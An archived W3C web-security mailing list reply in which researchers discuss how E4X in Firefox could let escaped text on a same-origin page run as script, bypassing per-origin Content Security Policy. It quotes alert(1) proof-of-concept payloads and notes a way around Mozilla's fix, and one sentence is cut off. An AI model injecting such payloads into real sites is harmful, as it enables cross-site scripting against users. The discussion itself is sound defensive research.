W3C home > Mailing lists > Public > public-web-security@w3.org > January 2011

Re: XSS mitigation in browsers

From: gaz Heyes <gazheyes@gmail.com>
Date: Thu, 20 Jan 2011 23:07:01 +0000
Message-ID: <AANLkTik6YY7AdXJ8mtk9SUYdbQOuGPtD7A-ULZvt9ySd@mail.gmail.com>
To: Michal Zalewski <lcamtuf@coredump.cx>
Cc: Brandon Sterne <bsterne@mozilla.com>, Adam Barth <w3c@adambarth.com>, public-web-security@w3.org, Sid Stamm <sid@mozilla.com>, Lucas Adamski <ladamski@mozilla.com>
On 20 January 2011 22:49, Michal Zalewski <lcamtuf@coredump.cx> wrote:

> Oh, and I noticed that CSP specifies allowable script locations on
> per-origin basis too.
> That would make it vulnerable to the two attacks I mentioned in my
> initial response to Adam, right?
> Specifically, consider that within any medium-complexity domain
> (mozilla.com, google.com, facebook.com), you can almost certainly
> discover a location that returns HTML-escaped attacker-supplied text
> in a context that would parse as valid JavaScript. This is easier than
> expected particularly in browsers that support E4X - such as Firefox.
> If I have a 404 HTML page saying:
> <html><body>
> ...
> The page at $escaped_request_location cannot be found.
> ...
> </body>
> </html>
> ...and $request_location = "/some/path/{alert(1)}", then user-supplied
> script will execute. To test, try this in Firefox:
> javascript:void(<html>foo {alert(1)}</html>)

Yeah this attack is known from a while ago (2009) but using JSON files with

Mozilla decided (I think) to protect against this by denying E4X documents
to be the "full program" but this is useless because we can simply split the
statement up. I love and hate E4X so much.

Received on Thursday, 20 January 2011 23:07:34 UTC

This archive was generated by hypermail 2.3.1 : Tuesday, 6 January 2015 20:26:18 UTC